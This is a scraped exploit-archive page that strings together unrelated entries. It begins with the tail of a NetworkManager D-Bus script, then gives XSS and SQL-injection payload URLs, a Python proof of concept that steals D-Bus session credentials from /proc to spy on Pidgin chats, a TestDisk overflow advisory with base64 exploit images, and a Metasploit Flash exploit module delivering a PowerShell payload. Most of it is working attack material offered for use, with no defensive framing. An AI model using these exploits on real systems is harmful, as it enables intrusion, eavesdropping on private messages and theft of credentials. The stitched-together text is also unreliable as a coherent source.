	    debug(0,"device %s, %s added"%(name, self.devtype2name(devtype)))

	    self.devices[device] = name
	    self.devices_by_name[name] = device

	    if devtype == 2:
		wifi = dbus.Interface(dev, "org.freedesktop.NetworkManager.Device.Wireless")
		aps = wifi.GetAccessPoints()
		for path in aps:
		    ap = self.bus.get_object("org.freedesktop.NetworkManager", path)
		    props = dbus.Interface(ap, "org.freedesktop.DBus.Properties")
		    ssid_raw = props.Get("org.freedesktop.NetworkManager.AccessPoint", "Ssid")
		    addr = props.Get("org.freedesktop.NetworkManager.AccessPoint", "HwAddress")
		    wpaflags = props.Get("org.freedesktop.NetworkManager.AccessPoint", "WpaFlags")
		    rsnflags = props.Get("org.freedesktop.NetworkManager.AccessPoint", "RsnFlags")
		    ssid = ''
		    for b in ssid_raw:
			if b > 20 and b < 126:
			    ssid += str(b)
			else:
			    ssid += '0x%02x'%b

		    self.aps[path] = {
			    'Ssid' : ssid_raw,
			    '_ssid_readable' : ssid,
			    'HwAddress' : addr,
			    'WpaFlags' : wpaflags,
			    'RsnFlags' : rsnflags,
			    }
		    self.ap_by_addr[addr] = path
		    if not ssid in self.ap_by_ssid:
			self.ap_by_ssid[ssid] = set({})
		    self.ap_by_ssid[ssid].add(path)

		for ssid in sorted(self.ap_by_ssid.keys()):
		    print ssid
		    for path in self.ap_by_ssid[ssid]:
			ap = self.aps[path]
			print ' ', ap['HwAddress']
			if ap['WpaFlags']:
			    print "    WPA: ", self.secflags2str(ap['WpaFlags'])
			if ap['RsnFlags']:
			    print "    RSN: ", self.secflags2str(ap['RsnFlags'])
	else:
	    if not device in self.devices:
		debug(0, "got remove signal for unknown device %s removed"%device)
	    else:
		name = self.devices[device]
		del self.devices[device]
		del self.devices_by_name[name]
		debug(0,"device %s removed"%name)

    def _connect_nm(self):
	try:
	    self.proxy = self.bus.get_object("org.freedesktop.NetworkManager", "/org/freedesktop/NetworkManager")
	    self.manager = manager = dbus.Interface(self.proxy, "org.freedesktop.NetworkManager")
	    running = True
	except dbus.DBusException, e:
	    running = False
	    print e

	return running

    def check_status(self, force_off=False):
	if (force_off):
	    running = False
	else:
	    running = self.running
	    if (not self.manager):
		running = self._connect_nm()

	if (running):
	    if (not self.running):
		devices = self.manager.GetDevices()
		for d in devices:
		    self.device_add_rm(d, True)

	if (not running):
	    self.proxy = self.manager = None

	self.running = running
	debug(1,"NM Running: %s"%self.running)

    def addcon(self, params, device, ap = '/'):
	if device[0] != '/':
	    if not device in self.devices_by_name:
		print "Error: device not known"
		sys.exit(1)
	    device = self.devices_by_name[device]
	if ap[0] != '/' and not 'ssid' in params['802-11-wireless']:
	    params['802-11-wireless']['ssid'] = [dbus.Byte(ord(c)) for c in ap]
	    if not ap in self.ap_by_ssid:
		print "Warning: ssid not known"
	    ap = '/'
	else:
	    ap = '/'

	self.manager.AddAndActivateConnection(params, device, ap)

if __name__ == '__main__':

    from optparse import OptionParser

    parser = OptionParser(usage="%prog [options]")
    parser.add_option('--debug', dest="debug", metavar='N',
	    action='store', type='int', default=0,
	    help="debug level")

    (opts, args) = parser.parse_args()
    if opts.debug:
	_debug_level = opts.debug

    dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
    mainloop = gobject.MainLoop()

    bus = dbus.SystemBus()

    nm = NetworkManager()

    if len(args) == 0:
	#mainloop.run()
	True
    elif args[0] == 'new':
	conn = {
		'connection': {
		    'permissions': [ 'user:joesix:' ],
		    'autoconnect': False,
		    'type': '802-11-wireless',
		    },
		'802-11-wireless': {
		    #'ssid': [ dbus.Byte(ord(c)) for c in "something" ],
		    'mode': 'infrastructure',
		    'security': '802-11-wireless-security',
		    }, 
		'802-1x': {
		    'eap': [ 'tls' ], # peap, ttls
		    'client-cert': [ dbus.Byte(ord(c)) for c in 'file:///home/foo/certs/cert.pem' ] + [ dbus.Byte(0) ],
		    'private-key': [ dbus.Byte(ord(c)) for c in 'file:///home/foo/certs/key.pem' ] + [ dbus.Byte(0) ],
		    'ca-cert': [ dbus.Byte(ord(c)) for c in 'file:///home/foo/certs/cacert.pem' ] + [ dbus.Byte(0) ],
		    'private-key-password': "12345",
		    #'ca-cert': 'hash://server/sha256/5336d308fa263f9f07325baae58ac972876f419527a9bf67c5ede3e668d3a925',
		    #'subject-match': '/CN=blah/emailAddress=foo@bar',
		    #'phase2-auth': 'mschapv2',
		    'identity': 'test1',
		    #'password': 'test1',
		    },
		'802-11-wireless-security': {
		    'key-mgmt': 'wpa-eap',
		    'auth-alg': 'open',
		    },
	}
	dev = args[1]
	ap = None
	if len(args) > 2:
	    ap = args[2]
	nm.addcon(conn, dev, ap)

# vim: sw=4 ts=8 noet
HireHackking 
source: https://www.securityfocus.com/bid/52183/info

Bontq is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/user/user/userinfo/id/2%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

http://www.example.com/user/reports/%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
HireHackking 
source: https://www.securityfocus.com/bid/52175/info

libpurple is prone to an information-disclosure vulnerability.

Successful exploits may allow attackers to obtain potentially sensitive information that may aid in other attacks.

The following products are vulnerable:

libpurple versions prior to 2.10.1
pidgin versions prior to 2.10.1
pidgin-otr versions prior to 3.2.0 

#!/usr/bin/env python
# PoC for snooping on pidgin discussions (OTR/non-OTR) via dbus
# (see CVE-2012-1257)
#
# requires python-dbus and python-gobject
#
# based on sample code found here:
# http://developer.pidgin.im/wiki/DbusHowto
#
# Disclaimer: There's virtually no error handling here,
# so don't rely on this for any serious work.
#
# Author:
# Dimitris Glynos :: { dimitris at census dash labs dot com }

import dbus, gobject, os, sys
from dbus.mainloop.glib import DBusGMainLoop

# same owner processes get to snoop their respective DBUS credentials
# via /proc/<pid>/environ

def obtain_dbus_session_creds():
	all_pids = [pid for pid in os.listdir('/proc') if pid.isdigit()]
	env_tmpl = '/proc/%s/environ'
	session_creds = {}

	for pid in all_pids:
		if not (os.stat(env_tmpl % pid).st_uid == os.getuid()):
			continue
		if not os.access(env_tmpl % pid, os.R_OK):
			continue

		f = open(env_tmpl % pid, 'rb')
		contents = f.read()
		f.close()
		for var in contents.split('\0'):
			if var.startswith('DBUS_SESSION_BUS_ADDRESS='):
				val = var[var.index('=')+1:]
				if not session_creds.has_key(val):
					session_creds[val] = 1
	return session_creds

def recvs(account, contact, msg, conversation, flags):
	print "received '%s' from %s" % (msg, contact)

def sends(account, contact, msg, conversation, flags):
	if flags == 1:
		print "sent '%s' to %s" % (msg, contact)

if not os.environ.has_key('DBUS_SESSION_BUS_ADDRESS'):
	creds = obtain_dbus_session_creds()

	if len(creds.keys()) == 0:
		print >> sys.stderr, ( "error: no dbus session " +
			"credentials could be recovered." )
		sys.exit(1)

	if len(creds.keys()) > 1:
		print >> sys.stderr, ( "error: multiple dbus session " +
			"credentials found!\nPlease rerun with the proper "+
			"DBUS_SESSION_BUS_ADDRESS env variable\n" +
			"Here are the recovered credentials:\n")
		for k in creds.keys():
			print >> sys.stderr, "DBUS_SESSION_BUS_ADDRESS=%s" % k
		sys.exit(1)

	os.environ["DBUS_SESSION_BUS_ADDRESS"] = creds.keys()[0]

dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
bus = dbus.SessionBus()

bus.add_signal_receiver(
	recvs,
	dbus_interface="im.pidgin.purple.PurpleInterface",
	signal_name="ReceivedImMsg"
)

bus.add_signal_receiver(
	sends,
	dbus_interface="im.pidgin.purple.PurpleInterface",
        signal_name="WroteImMsg"
)

mainloop = gobject.MainLoop()
mainloop.run()
HireHackking 
source: https://www.securityfocus.com/bid/52170/info

Webglimpse is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.

Webglimpse versions 2.18.8 and prior are affected. 

http://www.example.com/wgarcmin.cgi?URL2FIL=URL+2+File+--%3E&URL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NEXTPAGE=T

http://www.example.com/wgarcmin.cgi?FIL2URL=%3C--+File+2+URL&FILE=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NEXTPAGE=T

http://www.example.com/wgarcmin.cgi?DOMAIN=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NEXTPAGE=T
HireHackking 
source: https://www.securityfocus.com/bid/52168/info

MyJobList is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

MyJobList 0.1.3 is vulnerable; other versions may also be affected.

http://www.example.com/?loc=profile&eid=[SQLi]
HireHackking 
(    , )     (,
  .   '.' ) ('.    ',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _____/  / _  \    ____  ____   _____
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \
 /       \/   |    \\  \__(  <_> )  Y Y  \
/______  /\___|__  / \___  >____/|__|_|  /
        \/         \/.-.    \/         \/:wq
                    (x.0)
                  '=.|w|.='
                  _=''"''=.

                presents..

TestDisk 6.14 Check_OS2MB Stack Buffer Overflow
Affected versions: TestDisk 6.14 - Linux, Windows and Mac OSX

PDF:
http://www.security-assessment.com/files/documents/advisory/Testdisk%20Check_OS2MB%20Stack%20Buffer%20Overflow%20-%20Release.pdf

+-----------+
|Description|
+-----------+
This document details a stack based buffer overflow vulnerability within TestDisk 6.14. A buffer overflow is triggered
within the software when a malicious disk image is attempted to be recovered. This may be leveraged by an
attacker to crash TestDisk and gain control of program execution. An attacker would have to coerce the victim to run
TestDisk against their malicious image.

+------------+
|Exploitation|
+------------+
The check_OS2MB method (fat.c, line 862) is vulnerable to a stack based buffer overflow. This is due to the 512
byte buffer 'buffer' (defined in fat.c, check_OS2MB method, line 864) being overflowed by a subsequent memcpy
call in the cache_pread_aux method (hdcache.c, line 109). The third argument to the memcpy call (defining the
amount of data to be copied) is controlled by the attacker, this is set in a header in the test case (offset 0xC in the
below testcase, set to 2048, or 0x0800). 

The following GDB output shows the vulnerable memcpy call and the attacker controlled size argument (0x00000800):

Breakpoint 1, 0x0804e5c2 in cache_pread_aux (disk_car=0x80c13b0, buffer=0xbffff0f0, count=2048, offset=0, read_ahead=0) at hdcache.c:109
109      memcpy(buffer, cache->buffer + offset - cache->cache_offset, count);
(gdb) x/i $eip
=> 0x804e5c2 <cache_pread_aux+298>:  call   0x80499f0 <memcpy@plt>
(gdb) x/3x $esp
0xbffff010:  0xbffff0f0  0x080c3000  0x00000800

The following base64 data contains the test case which results in EIP control, in this case EIP being set to
BEE5BEE5. The value EIP is overwritten with is at 0x20c

6zyQbWtkb3dmcwAACASOAAEAAIAQ+AEAAQABAAAAAOs8kG1rZAApj2Ji7SAgICAgICAgICAgRkFU
ICAgICAgIEZBVDEyICAgDh++W3ysIsB0C/Ay5M0ezRnr/lRoaXMgaXMgbm90IGEgYm9vdGFibGUg
ZGlzay4gIFBsZWFzZSBpbnNlcnQgYSBib290YWJsZSBmbG9wcHkgYW5kDQpwcmVzcyBhbnkga2V5
IHRvIHRyeSBhZ2FpbiAuLi5ADQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA7v//f/8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADW1tbW1tbW1tbW1tbW1tbW
1tbW1tbW1tbW1tbW1tYAAAAAAAD+4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAA
AAAAAAAAAAAAAAD/D//pAAAA5gBAAAAAAAAAAB4AAAAAAAAAAAAAAPQAAAAAAOT98v//AAAAAAAA
AAAAEAD/AAAAAAAAAAAAAAAAAAAAgAAAAAUE/wAAAAAAAAAA7fcAAACAAAAAAAAAAAAABQAAAAAA
AAAAIwAAAACAAP/zAAAAAAQAAAAAAAAAAAAAAP8AAPj/ABcAAAAAAJaFhYWA/wAAAAAAAAAAVaoA
AAAAAAAAKY9iYu3lvuW+NAsGCA0K

--[ Linux
Note that in the provided test case, 4 bytes at 0x210 have been set to a valid address within the TEXT segment of
the TestDisk ELF file. This is due to GCC 4.7.2 compiling the Check_OS2MB method with the following assembly
code:

   0x08060a8d <+71>:  call   *%ecx
   0x08060a8f <+73>:  mov    %eax,%edx
   0x08060a91 <+75>:  mov    0x8(%ebp),%eax
   0x08060a94 <+78>:  mov    0x194(%eax),%eax
   0x08060a9a <+84>:  cmp    %eax,%edx
   0x08060a9c <+86>:  je     0x8060ac5 <check_OS2MB+127>

The instruction 'mov 0x8(%ebp), %eax' (0x08060a91) moves an attacker controlled portion of memory into the EAX
register and subsequently tries to read from that address ('mov 0x194(%eax)'). Thus, this has to be set to a
legitimate address, otherwise TestDisk performs an out-of-bounds memory read before returning from the
check_OS2MB method.

As long as EDX and EAX do not match, the check_OS2MB method calls screen_buffer_add and log_redirect, then
jumps to the end of the check_OS2MB method, successfully exploiting stack overflow and gaining EIP control.
The precompiled version of TestDisk has been compiled with a stack protector. In order to exploit the precompiled
version, an attacker would have to find a way to bypass GCC’s '-fstack-protector' functionality

--[ Windows
The provided test case results in EIP being overwritten with 0xBEE5BEE5 in the precompiled version of TestDisk. 
This was tested on Windows 7 and 8.1.

--[ Mac OSX
An attacker can also gain EIP control on the Mac OSX version of TestDisk 6.14, however the original test case
needs to be padded. The value EIP is overwritten with is at 0x21C in the OSX test case. The base64 of the OSX crash 
test case is below. As in the above examples, EIP is overwritten with 0xBEE5BEE5.

6zyQbWtkb3dmcwAACASOAAEAAIAQ+AEAAQABAAAAAOs8kG1rZAApj2Ji7SAgICAgICAgICAgRkFU
ICAgICAgIEZBVDEyICAgDh++W3ysIsB0C/Ay5M0ezRnr/lRoaXMgaXMgbm90IGEgYm9vdGFibGUg
ZGlzay4gIFBsZWFzZSBpbnNlcnQgYSBib290YWJsZSBmbG9wcHkgYW5kDQpwcmVzcyBhbnkga2V5
IHRvIHRyeSBhZ2FpbiAuLi5ADQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA7v//f/8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADW1tbW1tbW1tbW1tbW1tbW
1tbW1tbW1tbW1tbW1tYAAAAAAAD+4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAA
AAAAAAAAAAAAAAD/D//pAAAA5gBAAAAAAAAAAB4AAAAAAAAAAAAAAPQAAAAAAOT98v//AAAAAAAA
AAAAEAD/AAAAAAAAAAAAAAAAAAAAgAAAAAUE/wAAAAAAAAAA7fcAAACAAAAAAAAAAAAABQAAAAAA
AAAAIwAAAACAAP/zAAAAAAQAAAAAAAAAAAAAAP8AAPj/ABcAAAAAAJaFhYWA/wAAAAAAAAAAVaoA
AAAAAAAAKY9iYu0AAAAAAAAAAAAAAAAAAAAA5b7lvg==

+----------+
| Solution |
+----------+
Upgrade to TestDisk 7.0 or newer.

+-------------------+
|Disclosure Timeline|
+-------------------+
9/04/2015 – Advisory sent to Christophe Grenier.
9/04/2015 – Response from Christophe Grenier advising that a fix is ready for the 
development version. Christophe advised a new stable version will be available in 2 weeks.
18/04/2015 – TestDisk 7.0 Released.
30/04/2015 – Release of this document.

+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+

Security-Assessment.com is Australasia's leading team of Information 
Security consultants specialising in providing high quality Information 
Security services to clients throughout the Asia Pacific region. Our 
clients include some of the largest globally recognised companies in 
areas such as finance, telecommunications, broadcasting, legal and 
government. Our aim is to provide the very best independent advice and 
a high level of technical expertise while creating long and lasting 
professional relationships with our clients. Security-Assessment.com 
is committed to security research and development, and its team continues
to identify and responsibly publish vulnerabilities in public and 
private software vendor's products. Members of the 
Security-Assessment.com R&D team are globally recognised through their 
release of whitepapers and presentations related to new security research. 

For further information on this issue or any of our service offerings, 
contact us: 

Web www.security-assessment.com 
Email info () security-assessment com 
Phone +64 4 470 1650
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory',
      'Description'         => %q{
        This module exploits an unintialized memory vulnerability in Adobe Flash Player. The
        vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails
        to initialize allocated memory. When using a correct memory layout this vulnerability
        leads to a ByteArray object corruption, which can be abused to access and corrupt memory.
        This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with
        Flash 15.0.0.189.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Nicolas Joly', # Vulnerability discovery
          'Unknown', # Exploit in the wild
          'juan vazquez' # msf module
        ],
      'References'          =>
        [
          ['CVE', '2014-8440'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-24.html'],
          ['URL', 'http://malware.dontneedcoffee.com/2014/11/cve-2014-8440.html'],
          ['URL', 'http://www.verisigninc.com/en_US/cyber-security/security-intelligence/vulnerability-reports/articles/index.xhtml?id=1081']
        ],
      'Payload'             =>
        {
          'DisableNops' => true
        },
      'Platform'            => 'win',
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => OperatingSystems::Match::WINDOWS_7,
          :ua_name => Msf::HttpClients::IE,
          :flash   => lambda { |ver| ver =~ /^15\./ && ver <= '15.0.0.189' },
          :arch    => ARCH_X86
        },
      'Targets'             =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'          => false,
      'DisclosureDate'      => 'Nov 11 2014',
      'DefaultTarget'       => 0))
  end

  def exploit
    @swf = create_swf
    super
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
    b64_payload = Rex::Text.encode_base64(psh_payload)

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-8440', 'msf.swf')
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }

    swf
  end

end
HireHackking 
source: https://www.securityfocus.com/bid/52136/info

Mobile Mp3 Search Script is prone to an HTTP-response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data.

Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.

Mobile Mp3 Search Script 2.0 is vulnerable; other versions may also be affected 

http://www.example.com/dl.php?url=http://www.google.it